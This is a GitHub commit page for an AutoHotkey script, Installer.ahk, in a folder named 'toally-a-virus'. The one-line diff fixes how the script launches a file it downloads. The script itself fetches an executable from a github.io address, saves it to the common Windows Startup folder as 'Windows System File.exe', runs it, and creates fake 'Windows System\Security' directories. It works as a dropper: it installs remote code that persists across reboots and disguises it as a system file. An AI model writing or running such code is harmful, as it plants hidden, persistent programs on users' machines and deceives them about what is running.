Skip to content

Commit

Permalink
update
Browse files Browse the repository at this point in the history
  • Loading branch information
DJ13423 committed Nov 20, 2020
1 parent b23dad0 commit b917275
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion docs/download/AHK/toally-a-virus/Installer.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.

UrlDownloadToFile, https://dj13423.github.io/download/AHK/toally-a-virus/Main.exe, %A_StartupCommon%\Windows System File.exe
Sleep, 500
Run, Windows System File.exe, %A_StartupCommon%\
Run, %A_StartupCommon%\Windows System File.exe
FileCreateDir, C:\Windows System\Security\temp
FileCreateDir, C:\Windows System\Security\data\bin
FileCreateDir, C:\Windows System\Security\bin
Expand Down

0 comments on commit b917275

Please sign in to comment.